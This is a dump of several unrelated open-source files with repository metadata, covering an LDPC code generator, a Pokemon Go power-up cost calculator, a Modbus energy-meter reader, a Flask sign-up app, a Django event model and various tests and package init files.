        'Number of vars in varDegrees does not sum to N.')
    edgesFromChecks = DotProduct(checkDegrees.keys(),checkDegrees.values())
    edgesFromVars = DotProduct(varDegrees.keys(),varDegrees.values())
    assert edgesFromVars == edgesFromChecks, (
        '# edges from vars != # edges from checks:' +
        `edgesFromVars` + ' != ' + `edgesFromChecks`)
    assert N > max(checkDegrees.keys())
    assert M > max(varDegrees.keys())
    result = [0]*M
    # Build the pool of variable-side edge stubs: variable v of degree d
    # appears d times in `vars`.
    vars = []
    curVarIndex = 0
    for d in varDegrees.keys(): # for each possible var degree
        for i in range(varDegrees[d]): # for each of var with that degree
            vars.extend([curVarIndex]*d)
            curVarIndex = curVarIndex+1
    assert curVarIndex==N
    # Each check draws its connections uniformly from the stub pool;
    # a stub that would create a multi-edge is discarded (see docstring).
    curCheckIndex = 0
    for d in checkDegrees.keys(): # for each possible check degree
        for i in range(checkDegrees[d]): # for each check with that degree
            result[curCheckIndex] = [None]*d
            for connectionForCheck in range(d):
                vIndex = random.randrange(len(vars))
                if (result[curCheckIndex].count(vars[vIndex]) == 0):
                    result[curCheckIndex][connectionForCheck]=vars.pop(vIndex)
                else:
                    print 'warning not adding multi-edge'
                    vars.pop(vIndex)
            while (result[curCheckIndex].count(None)>0):
                result[curCheckIndex].pop(result[curCheckIndex].index(None))
            curCheckIndex = curCheckIndex + 1
    assert len(vars)==0, 'vars should be empty but it is' + `vars`
    return result
def IntegrateLambdaOrRho(terms):
    """
    Integrate a lambda or rho edge-degree polynomial from 0 to 1.

    terms: hash mapping degree i to its coefficient; e.g. the polynomial
           lambda(x) = .4 x^2 + .6 x^3 is passed as {2: .4, 3: .6}.

    The coefficients must sum to (approximately) 1; this is asserted.
    Returns sum_i terms[i]/i, the integral of the polynomial over [0, 1].
    """
    coeff_total = 0
    integral = 0
    for degree in terms.keys():
        coeff_total = coeff_total + terms[degree]
        integral = integral + terms[degree] / float(degree)
    assert abs(coeff_total - 1.0) < .0001
    return integral
def LambdaRhoToDegreeSequences(N,M,lam,rho):
    """
    Convert edge-perspective degree distributions into node counts.

    N:   Block size (number of variable nodes).
    M:   Number of check nodes (constraints).
    lam: Hash where lam[i] = p means a fraction p of EDGES attach to a
         variable node of degree i.
    rho: Hash where rho[i] = p means a fraction p of EDGES attach to a
         check node of degree i.

    Returns (varDegrees, checkDegrees), where varDegrees[i] = y means
    there are y variable nodes of degree i (rounded to the nearest
    integer), and similarly for checkDegrees.
    """
    var_edge_total = float(N) / IntegrateLambdaOrRho(lam)
    check_edge_total = float(M) / IntegrateLambdaOrRho(rho)
    varDegrees = {}
    for degree in lam.keys():
        varDegrees[degree] = int(round(var_edge_total * lam[degree] / float(degree)))
    checkDegrees = {}
    for degree in rho.keys():
        checkDegrees[degree] = int(round(check_edge_total * rho[degree] / float(degree)))
    return (varDegrees, checkDegrees)
def ComputeEdgeMismatch(varDegrees,checkDegrees):
    """Return (#edge stubs implied by checkDegrees) minus (#implied by varDegrees).

    A non-zero result means the two degree sequences cannot be wired into
    a bipartite graph without adjustment.
    """
    check_edges = DotProduct(checkDegrees.keys(), checkDegrees.values())
    var_edges = DotProduct(varDegrees.keys(), varDegrees.values())
    return check_edges - var_edges
def MakeIrregularLDPCCodeFromLambdaRho(N,K,lam,rho):
    """
    MakeIrregularLDPCCodeFromLambdaRho(N,K,lam,rho):
    N:    Block size.
    K:    Dimension.
    lam:  A hash table specifying the variable degress using the lambda
          notation.  Specifically, lam[i] = p denotes that the fraction
          of EDGES coming from a variable node of degree i is p.
    rho:  A hash table specifying the check degress using the rho
          notation.  Specifically, rho[i] = p denotes that the fraction
          of EDGES coming from a check node of degree i is p.
    This function creates an irregular LDPC code for the desired parameters.
    """
    M=N-K
    total = 0
    (varDegrees,checkDegrees) = LambdaRhoToDegreeSequences(N,M,lam,rho)
    # Rounding in LambdaRhoToDegreeSequences can leave the node counts off;
    # shave the surplus off the most numerous check degree so they sum to M.
    for key in checkDegrees.keys():
        total = total + checkDegrees[key]
    cCleanupIndex = checkDegrees.values().index(max(checkDegrees.values()))
    cCleanupIndex = checkDegrees.keys()[cCleanupIndex]
    checkDegrees[cCleanupIndex] = checkDegrees[cCleanupIndex] - (total-M)
    assert checkDegrees[cCleanupIndex] > 0
    # Same correction on the variable side so the counts sum to N.
    total = 0
    for key in varDegrees.keys():
        total = total + varDegrees[key]
    vCleanupIndex = varDegrees.values().index(max(varDegrees.values()))
    vCleanupIndex = varDegrees.keys()[vCleanupIndex]
    varDegrees[vCleanupIndex] = varDegrees[vCleanupIndex] - (total-N)
    assert varDegrees[vCleanupIndex] > 0
    # Rebalance the two smallest variable degrees to shrink the stub-count
    # mismatch between the variable and check sides.
    edgeMismatch = ComputeEdgeMismatch(varDegrees, checkDegrees)
    print 'Cleaning up edge mismatch of ', edgeMismatch
    k = varDegrees.keys()
    k.sort()
    degreeDiff = k[1]-k[0]
    edgeDiff = edgeMismatch/degreeDiff +1
    varDegrees[k[0]]=varDegrees[k[0]]-edgeDiff
    varDegrees[k[1]]=varDegrees[k[1]]+edgeDiff
    assert varDegrees[k[0]] > 0
    assert varDegrees[k[1]] > 0
    # Absorb any remaining (negative) mismatch by swapping one check of the
    # smallest degree for one check of exactly the missing degree.
    edgeMismatch = ComputeEdgeMismatch(varDegrees,checkDegrees)
    k = checkDegrees.keys()
    k.sort()
    if (edgeMismatch < 0):
        checkDegrees[k[0]] = checkDegrees[k[0]] - 1
        edgeMismatch = edgeMismatch - k[0]
        if (not checkDegrees.has_key(-edgeMismatch)):
            checkDegrees[-edgeMismatch]=0
        checkDegrees[-edgeMismatch]=checkDegrees[-edgeMismatch]+1
        print 'Adding one check of degree', -edgeMismatch, 'to fix mismatch.'
    else:
        # haven't yet implemented this case
        assert 0
    print 'using -->', varDegrees, checkDegrees
    return MakeIrregularLDPCCode(N,K,varDegrees,checkDegrees)
| 38.755556 | 117 | 0.648263 |
3ab3e2941b6f403af41700077d7767ce4d038166 | 457 | py | Python | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | 1 | 2020-09-24T00:34:06.000Z | 2020-09-24T00:34:06.000Z | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | null | null | null | catalyst/contrib/nn/modules/__init__.py | denyhoof/catalyst | a340450076f7846007bc5695e5163e15b7ad9575 | [
"Apache-2.0"
] | 1 | 2020-09-24T00:34:07.000Z | 2020-09-24T00:34:07.000Z | # flake8: noqa
from torch.nn.modules import *
from .common import Flatten, GaussianNoise, Lambda, Normalize
from .lama import LamaPooling, TemporalAttentionPooling, TemporalConcatPooling
from .pooling import (
GlobalAttnPool2d,
GlobalAvgAttnPool2d,
GlobalAvgPool2d,
GlobalConcatAttnPool2d,
GlobalConcatPool2d,
GlobalMaxAttnPool2d,
GlobalMaxPool2d,
)
from .rms_norm import RMSNorm
from .se import (
sSE,
scSE,
cSE,
)
| 21.761905 | 78 | 0.750547 |
3ab4a94d8c1d32caca854e9194abb1b42f0cfa0c | 1,559 | py | Python | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | pogopowerupcost/pogopowerupcost.py | HankB/pogopowerupcost | 348f2414029b15909b82ea109429b8f96937f019 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding=utf-8
"""
Strategy to eliminate redundant lines.
- remove redundant lines
- calculate the correct key for a given level
"""
# Cost tables: each key is the table key returned by get_table_key for a
# pair of half-levels; each value is [stardust, candy] per half-level step.
NORMAL_COST_PER_POWERUP = {
    2.5: [200, 1],
    4.5: [400, 1],
    6.5: [600, 1],
    8.5: [800, 1],
    10.5: [1000, 1],
    12.5: [1300, 2],
    14.5: [1600, 2],
    16.5: [1900, 2],
    18.5: [2200, 2],
    20.5: [2500, 2],
    22.5: [3000, 3],
    24.5: [3500, 3],
    26.5: [4000, 3],
    28.5: [4500, 3],
    30.5: [5000, 4],
    32.5: [6000, 6],
    34.5: [7000, 8],
    36.5: [8000, 10],
    38.5: [9000, 12],
    40.5: [10000, 15],  # Unconfirmed
}
SHADOW_COST_PER_POWERUP = {
    2.5: [240, 2],
    4.5: [480, 2],
    6.5: [720, 2],
    8.5: [960, 2],
    10.5: [1200, 2],
    12.5: [1560, 3],
    14.5: [1920, 3],
    16.5: [2280, 3],
    18.5: [2640, 3],
    20.5: [3000, 3],
    22.5: [3600, 4],
    24.5: [4200, 4],
    26.5: [4800, 5],
    28.5: [5400, 5],
    30.5: [6000, 8],
    32.5: [7200, 10],
    34.5: [8400, 10],
    36.5: [9600, 12],
    38.5: [10800, 15],
    40.5: [12000, 18],  # Unconfirmed
}
def get_table_key(level):
    """Return the cost-table key covering `level`.

    Keys cover two consecutive half-levels each: e.g. both 2 and 2.5
    map to 2.5, both 3 and 3.5 map to 4.5.
    """
    offset = (level + 1) % 2
    return level - offset + 1.5
def calculate_powerup_cost(from_level, to_level, cost_table=NORMAL_COST_PER_POWERUP):
    """Total cost to power up from `from_level` to `to_level`.

    Sums the per-half-level cost from `cost_table` (defaults to the
    normal, non-shadow table) over every half-level step in the range.
    Returns a dict with 'stardust' and 'candy' totals.
    """
    stardust_total = 0
    candy_total = 0
    level = from_level
    while level < to_level:
        stardust, candy = cost_table[get_table_key(level)]
        stardust_total += stardust
        candy_total += candy
        level += 0.5
    return {
        'stardust': stardust_total,
        'candy': candy_total,
    }
| 21.067568 | 85 | 0.550994 |
3ab542c9882e6ca1b34d6c4578175afe66cf3890 | 516 | py | Python | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | Source/Ventanas/login.py | NicolasTangredi/grupo4 | 4261f34c6600409434fc548d764dbb43bfb9c2f1 | [
"MIT"
] | null | null | null | import PySimpleGUI as sg
def build_login():
    """Build and return the user login window (labels are in Spanish)."""
    user_row = [sg.T("Usuario", size=(8,1)), sg.InputText(key='-USER-')]
    pass_row = [sg.T("Contraseña", size=(8,1)), sg.InputText(key='-PASS-')]
    submit_row = [sg.Submit("LogIn", size=(15,1), pad=(0,15))]
    prompt_row = [sg.T("No estas registrado?")]
    register_row = [sg.Button('Registrarse', size=(15,1))]
    rows = [user_row, pass_row, submit_row, prompt_row, register_row]
    return sg.Window('Inicio de sesion', rows, element_justification='center')
| 34.4 | 82 | 0.585271 |
3ab65f9233f5b33fe212c56ac9a65bed2532c487 | 446 | py | Python | tests/core/test_formatter.py | My-Novel-Management/storybuilderunite | c003d3451e237f574c54a87ea7d4fd8da8e833be | [
"MIT"
] | 1 | 2020-06-18T01:38:55.000Z | 2020-06-18T01:38:55.000Z | tests/core/test_formatter.py | My-Novel-Management/storybuilder | 1f36e56a74dbb55a25d60fce3ce81f3c650f521a | [
"MIT"
] | 143 | 2019-11-13T00:21:11.000Z | 2020-08-15T05:47:41.000Z | tests/core/test_formatter.py | My-Novel-Management/storybuilderunite | c003d3451e237f574c54a87ea7d4fd8da8e833be | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Formatter class test
====================
'''
import unittest
from tests.testutils import print_testtitle, validate_with_fail
from builder.core import formatter as fm
class FormatterTest(unittest.TestCase):
    """Unit tests for builder.core.formatter.Formatter."""

    @classmethod
    def setUpClass(cls):
        # Announce this suite once before any of its tests run.
        print_testtitle(fm.__name__, 'Formatter class')

    def test_instance(self):
        formatter_obj = fm.Formatter()
        self.assertIsInstance(formatter_obj, fm.Formatter)
| 20.272727 | 63 | 0.674888 |
3ab8056bbcfb11d7cb0f257beb6843279b5e80cf | 86 | py | Python | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | 1 | 2022-01-08T20:46:43.000Z | 2022-01-08T20:46:43.000Z | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | null | null | null | reliabilipy/__init__.py | rafaelvalero/omegapy | 5cc6288f9b0d6101de87229ce0f3a392ff3d1e8a | [
"MIT"
] | null | null | null | from ._reliabili import reliability_analysis
__all__ = [
"reliability_analysis",
] | 21.5 | 44 | 0.77907 |
3aba1d78d37e1173705ea143efeb8730018f6cb1 | 1,296 | py | Python | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | 1 | 2020-03-13T22:34:03.000Z | 2020-03-13T22:34:03.000Z | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | null | null | null | pynasqm/trajectories/get_reference_job.py | PotentialParadox/pynasqm | 1bd51299b6ca7f8229d8a15428515d53a358903c | [
"MIT"
] | null | null | null | from functools import singledispatch
from pynasqm.trajectories.fluorescence import Fluorescence
from pynasqm.trajectories.absorption import Absorption
@singledispatch
def get_reference_job(traj_data):
    # Dispatch base: only the trajectory types registered below are supported.
    raise NotImplementedError(f"traj_data type not supported by get_refer\n"\
                              f"{traj_data}")
@get_reference_job.register(Fluorescence)
def _(traj_data):
    # Fluorescence trajectories reference the "qmexcited" job.
    return "qmexcited"
@get_reference_job.register(Absorption)
def _(traj_data):
    # Absorption trajectories reference the "qmground" job.
    return "qmground"
@singledispatch
def get_n_trajs_of_reference(traj_data):
    # Dispatch base: unsupported trajectory types fail loudly.
    raise NotImplementedError(f"traj_data type not supported by get_ntrajs_of_reference\n"\
                              f"{traj_data}")
@get_n_trajs_of_reference.register(Fluorescence)
def _(traj_data):
    # Fluorescence: snapshot count taken from user_input.n_snapshots_ex.
    return traj_data.user_input.n_snapshots_ex
@get_n_trajs_of_reference.register(Absorption)
def _(traj_data):
    # Absorption: snapshot count taken from user_input.n_snapshots_qmground.
    return traj_data.user_input.n_snapshots_qmground
@singledispatch
def get_n_ref_runs(traj_data):
    # Dispatch base: unsupported trajectory types fail loudly.
    raise NotImplementedError(f"traj_data type not supported by get_nref_runs\n"\
                              f"{traj_data}")
@get_n_ref_runs.register(Fluorescence)
def _(traj_data):
    # Fluorescence: run count taken from user_input.n_exc_runs.
    return traj_data.user_input.n_exc_runs
@get_n_ref_runs.register(Absorption)
def _(traj_data):
    # Absorption: run count taken from user_input.n_qmground_runs.
    return traj_data.user_input.n_qmground_runs
| 35.027027 | 91 | 0.765432 |
3aba773aa612d9acfa1ae100f08af08822858dc4 | 6,283 | py | Python | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
] | 2 | 2020-06-25T17:19:05.000Z | 2020-10-13T06:08:39.000Z | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
] | null | null | null | tests/fire_groups/test_damage_profile.py | spascou/ps2-analysis | 00f99b009d15d4c401a3338ddd0408ac7eedcc0b | [
"MIT"
] | null | null | null | from ps2_census.enums import ResistType
from ps2_analysis.enums import DamageTargetType
from ps2_analysis.fire_groups.damage_profile import DamageLocation, DamageProfile
def test_damage_delta():
    """damage_delta is max_damage - min_damage (0 when they are equal)."""
    dp: DamageProfile = DamageProfile(
        max_damage=100,
        max_damage_range=1234,
        min_damage=100,
        min_damage_range=5678,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_delta == 0
    dp: DamageProfile = DamageProfile(
        max_damage=100,
        max_damage_range=1234,
        min_damage=90,
        min_damage_range=5678,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_delta == 10
def test_damage_range_delta():
    """damage_range_delta is min_damage_range - max_damage_range (0 when equal)."""
    dp: DamageProfile = DamageProfile(
        max_damage=5678,
        max_damage_range=0,
        min_damage=1234,
        min_damage_range=0,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_range_delta == 0
    dp: DamageProfile = DamageProfile(
        max_damage=5678,
        max_damage_range=10,
        min_damage=1234,
        min_damage_range=100,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_range_delta == 90
def test_damage_per_pellet():
    """Pellet damage: flat when max == min, linear falloff between the two
    ranges otherwise; nanoweave (100 -> 80 here) and hit-location
    multipliers (HEAD x2.0 here) scale the result."""
    # Flat profile: same damage at every distance.
    dp: DamageProfile = DamageProfile(
        max_damage=100,
        max_damage_range=0,
        min_damage=100,
        min_damage_range=0,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_per_pellet(0) == 100
    assert dp.damage_per_pellet(10) == 100
    assert dp.damage_per_pellet(1000) == 100
    assert (
        dp.damage_per_pellet(0, damage_target_type=DamageTargetType.INFANTRY_NANOWEAVE)
        == 80
    )
    # Falloff profile: 90 up to 10m, linear down to 10 at 20m, flat after.
    dp: DamageProfile = DamageProfile(
        max_damage=90,
        max_damage_range=10,
        min_damage=10,
        min_damage_range=20,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_per_pellet(0) == 90
    assert dp.damage_per_pellet(10) == 90
    assert dp.damage_per_pellet(15) == 50
    assert dp.damage_per_pellet(20) == 10
    assert dp.damage_per_pellet(30) == 10
    # Same profile with a 2.0 headshot multiplier; LEGS has no multiplier.
    dp: DamageProfile = DamageProfile(
        max_damage=90,
        max_damage_range=10,
        min_damage=10,
        min_damage_range=20,
        location_multiplier={DamageLocation.HEAD: 2.0},
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_per_pellet(0, damage_location=DamageLocation.HEAD) == 180
    assert dp.damage_per_pellet(10, damage_location=DamageLocation.HEAD) == 180
    assert dp.damage_per_pellet(15, damage_location=DamageLocation.HEAD) == 100
    assert dp.damage_per_pellet(20, damage_location=DamageLocation.HEAD) == 20
    assert dp.damage_per_pellet(30, damage_location=DamageLocation.HEAD) == 20
    assert dp.damage_per_pellet(0, damage_location=DamageLocation.LEGS) == 90
    assert dp.damage_per_pellet(10, damage_location=DamageLocation.LEGS) == 90
    assert dp.damage_per_pellet(15, damage_location=DamageLocation.LEGS) == 50
    assert dp.damage_per_pellet(20, damage_location=DamageLocation.LEGS) == 10
    assert dp.damage_per_pellet(30, damage_location=DamageLocation.LEGS) == 10
def test_damage_per_shot():
    """Shot damage follows the same falloff as a pellet; with multiple
    pellets it is pellets_count times the per-pellet damage."""
    dp: DamageProfile = DamageProfile(
        max_damage=1500,
        max_damage_range=100,
        min_damage=500,
        min_damage_range=200,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_per_shot(0) == 1500
    assert (
        dp.damage_per_shot(0, damage_target_type=DamageTargetType.INFANTRY_NANOWEAVE)
        == 1200
    )
    assert dp.damage_per_shot(100) == 1500
    assert dp.damage_per_shot(150) == 1000
    assert dp.damage_per_shot(200) == 500
    assert dp.damage_per_shot(300) == 500
    # Four pellets: shot damage is 4x the single-pellet damage.
    dp: DamageProfile = DamageProfile(
        max_damage=100,
        max_damage_range=0,
        min_damage=100,
        min_damage_range=0,
        pellets_count=4,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.damage_per_shot(0) == 4 * dp.damage_per_pellet(0)
def test_shots_to_kill():
    """Shots-to-kill rises as falloff reduces per-shot damage; headshot
    multiplier lowers it; a zero-damage profile reports -1."""
    dp: DamageProfile = DamageProfile(
        max_damage=1500,
        max_damage_range=200,
        min_damage=500,
        min_damage_range=400,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.shots_to_kill(0) == 1
    assert dp.shots_to_kill(200) == 1
    assert dp.shots_to_kill(300.1) == 2
    assert dp.shots_to_kill(400) == 2
    assert dp.shots_to_kill(500) == 2
    dp: DamageProfile = DamageProfile(
        max_damage=500,
        max_damage_range=10,
        min_damage=100,
        min_damage_range=20,
        location_multiplier={DamageLocation.HEAD: 2.0},
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.shots_to_kill(0) == 2
    assert dp.shots_to_kill(0, damage_location=DamageLocation.HEAD) == 1
    assert dp.shots_to_kill(30) == 10
    assert dp.shots_to_kill(30, damage_location=DamageLocation.HEAD) == 5
    # Degenerate profile that deals no damage: kill is impossible (-1).
    dp: DamageProfile = DamageProfile(
        max_damage=0,
        max_damage_range=10,
        min_damage=0,
        min_damage_range=20,
        location_multiplier={DamageLocation.HEAD: 2.0},
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert dp.shots_to_kill(0) == -1
    assert dp.shots_to_kill(30) == -1
def test_shots_to_kill_ranges():
    """shots_to_kill_ranges yields (start_distance, shots) breakpoints;
    a single entry when the shot count never changes with distance."""
    dp: DamageProfile = DamageProfile(
        max_damage=1500,
        max_damage_range=0,
        min_damage=1000,
        min_damage_range=0,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert list(dp.shots_to_kill_ranges()) == [(0.0, 1)]
    # Falloff crosses a kill breakpoint at 150m: 1 shot before, 2 after.
    dp: DamageProfile = DamageProfile(
        max_damage=1500,
        max_damage_range=100,
        min_damage=500,
        min_damage_range=200,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert list(dp.shots_to_kill_ranges()) == [(0.0, 1), (150.0, 2)]
    dp: DamageProfile = DamageProfile(
        max_damage=1500,
        max_damage_range=100,
        min_damage=1500,
        min_damage_range=200,
        pellets_count=1,
        resist_type=ResistType.SMALL_ARM,
    )
    assert list(dp.shots_to_kill_ranges()) == [(0.0, 1)]
| 29.087963 | 87 | 0.665287 |
3aba7ed065768797a2e46990d868b26246bb0ccc | 5,418 | py | Python | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | 2 | 2021-09-15T11:14:18.000Z | 2021-09-19T23:40:09.000Z | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | null | null | null | EM6436_singlephasemode.py | saishibu/EM6400_Modbus_RPi | 9025d159d84407b92275208b874c140f86f1d306 | [
"MIT"
] | 3 | 2017-09-23T05:28:21.000Z | 2019-12-26T01:29:17.000Z | #ModBUS Communication between Schneider EM6436 Meter and Raspberry Pi
#First beta version.
#The meter is set with the following settings
#Communication : (RS484 to RS232 to USB) - BaudRate = 19200, Parity = N, Stopbits = 1, Device ID=1 (Hardcode in meter)
#Electical Settings: APri:50, Asec: 5, VPri: 415, Vsec:415, SYS: SINGLE
#To use the meter in Single Phase mode, Some address has to be commented.
#This program was tested on RPi3 running Rasbian Jessie Pixel from Noobs V2
#Debian Kernel = Linux raspberrypi 4.4.38-v7+ #938 SMP Thu Dec 15 15:22:21 GMT 2016 armv7l GNU/Linux
#Additional Packages: pymodbus,pyserial. (available in pyPi repo)
#V1.0b Feb2,2017
#Code by Sai Shibu (AWNA/058/15)
#Copyrights AmritaWNA Smartgrid Tag
import time
import pymodbus
import serial
from pymodbus.pdu import ModbusRequest
from pymodbus.client.sync import ModbusSerialClient as ModbusClient
from pymodbus.transaction import ModbusRtuFramer
# Endian library for decoding HEX to Float
from pymodbus.constants import Endian
from pymodbus.payload import BinaryPayloadDecoder as decode
from pymodbus.payload import BinaryPayloadBuilder as builder

# EM6436 is defined as client (RS485 slave id 1 — see header for meter setup).
client = ModbusClient(method='rtu', port='/dev/ttyUSB0', timeout=0.05)
client.connect()


def read_float(address):
    """Read 2 holding registers at *address* from slave 1 and decode them
    as a little-endian 32-bit float (EM6436 register layout)."""
    reply = client.read_holding_registers(address, 2, unit=1)
    return decode.fromRegisters(
        reply.registers, endian=Endian.Little).decode_32bit_float()


def read_uint16(address):
    """Read holding registers at *address* and decode a 16-bit unsigned int."""
    reply = client.read_holding_registers(address, 2, unit=1)
    return decode.fromRegisters(
        reply.registers, endian=Endian.Little).decode_16bit_uint()


# Poll the meter forever, printing one report block per iteration.
# Output format is identical to the original script (section header
# followed by the decoded value, separated by dashed rules).
while True:
    separator = "-" * 100
    print(separator)
    print(time.strftime('%H:%M:%S %d-%m-%Y'))

    print("Current Values")
    print(read_float(3912))          # average current (A)
    print(separator)

    print("Voltage Values")
    print(read_float(3910))          # line-neutral voltage (V)
    print(separator)

    print("Power Factor Values")
    print(read_float(3906))
    print(separator)

    print("Frequency Value")
    print(read_float(3914))
    print(separator)

    print("Power Values")
    # NOTE: EM6436 does not provide VAR values, only W and VA.
    print(read_float(3902))          # active power (W)
    print(read_float(3900))          # apparent power (VA)
    print(separator)

    print("Energy Value")
    print(read_float(3958))          # apparent energy (VAh)
    print(read_float(3960))          # active energy (Wh)
    print(separator)

    print("interruption")
    print(read_uint16(3998))         # power interruption count
    print(separator)

    # NOTE(review): the original script closed the connection on every
    # iteration; kept for behavioural parity (pymodbus reconnects on the
    # next read) but this is probably unintentional — confirm.
    client.close()
| 30.1 | 118 | 0.622924 |
3abaf7778575fb33671c68f93238545045ace437 | 2,350 | py | Python | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | webapp.py | eyan02/WebApp | 4df02491dc6c27985e39c9d003eca1e662740000 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, json, request, redirect, session, jsonify
from flaskext.mysql import MySQL
from werkzeug import generate_password_hash, check_password_hash
# Flask application and MySQL connector wiring.
mysql = MySQL()
app = Flask(__name__)
# randomly generated encryption & decryption key, ensures security of a communications session
# NOTE(review): the key below is actually hard-coded, not randomly generated.
# Move it — and the DB credentials under it — out of source control and into
# environment variables or a config file before deploying.
app.secret_key = "captain knuckles?"
# MySQL configurations
app.config["MYSQL_DATABASE_USER"] = "root"
app.config["MYSQL_DATABASE_PASSWORD"] = "ohgodwhyisthis!"
app.config["MYSQL_DATABASE_DB"] = "milestone"
app.config["MYSQL_DATABASE_HOST"] = "localhost"
mysql.init_app(app)
# ==============================================================================
@app.route("/")
def main():
return render_template("index.html")
@app.route("/signUp")
def showSignUp():
return render_template("signUp.html")
# ==============================================================================
# SIGN UP
@app.route("/signUp",methods=["POST","GET"])
def signUp():
try:
_name = request.form["inputName"]
_email = request.form["inputEmail"]
_password = request.form["inputPassword"]
# validates input values
if _name and _email and _password:
conn = mysql.connect()
cursor = conn.cursor()
_hashed_password = generate_password_hash(_password)
cursor.callproc("sp_createUser",(_name,_email,_hashed_password))
data = cursor.fetchall()
if len(data) is 0:
conn.commit()
return jsonify({"message":"User created successfully !"})
else:
return jsonify({"error":"User already exists !"})
else:
return jsonify({"error":"Enter all required fields"})
except Exception as e:
return jsonify({"error":str(e)})
finally:
cursor.close()
conn.close()
# ==============================================================================
# ==============================================================================
# ==============================================================================
# =====================================================
# FOR REALTIME DEBUGGING AND UPDATE WITHOUT APP RESTART
if __name__ == "__main__":
app.run(port=5002, debug=True)
# =====================================================
| 35.074627 | 94 | 0.514043 |
3ac0403526cc926b39bbe5158b35b86efdd85742 | 1,359 | py | Python | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | core/models.py | RafaelAparecidoSilva/Projeto_Django_DIO | 430b0166b39bc74f895805e51b1332c9184eccad | [
"MIT"
] | null | null | null | from django.db import models
# Importamos o User do sistema para utilizar os dados dos usuários que registramos no admin do django
# (desta forma não precisamos criar uma tabela específica no models para representar os usuários).
from django.contrib.auth.models import User
from datetime import datetime
class Evento(models.Model):
    """Calendar event owned by a Django auth user."""

    titulo = models.CharField(max_length=100, verbose_name='Título')
    descricao = models.TextField(blank=True, null=True)
    data_evento = models.DateTimeField(verbose_name='Data do Evento')
    data_criacao = models.DateTimeField(auto_now=True, verbose_name='Data de Criação')
    # CASCADE: deleting the user also deletes all of their events.
    usuario = models.ForeignKey(User, on_delete=models.CASCADE)

    class Meta:
        db_table = 'evento'  # explicit table name in the database

    def get_data_evento(self):
        """Event date formatted for display: dd/mm/YYYY - HH:MMh."""
        return self.data_evento.strftime('%d/%m/%Y - %H:%Mh')

    def get_data_input_evento(self):
        """Event date formatted for an HTML datetime-local input."""
        return self.data_evento.strftime('%Y-%m-%dT%H:%M')

    def get_evento_atrasado(self):
        """True when the event's date is already in the past.

        NOTE(review): compares against naive datetime.now(); if the project
        enables USE_TZ this comparison will misbehave — confirm settings.
        """
        # Direct boolean return replaces the former if/else True/False.
        return self.data_evento < datetime.now()
| 41.181818 | 132 | 0.717439 |
3ac1c768c158dc838dfae0e6094464208e94f0f5 | 434 | py | Python | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
] | 6 | 2020-09-22T06:54:51.000Z | 2021-03-25T05:38:05.000Z | feature_generation/normalize/rolling_mean.py | s0lvang/ideal-pancake | f7a55f622b02b03a987d74cfdff1c51288bfb657 | [
"MIT"
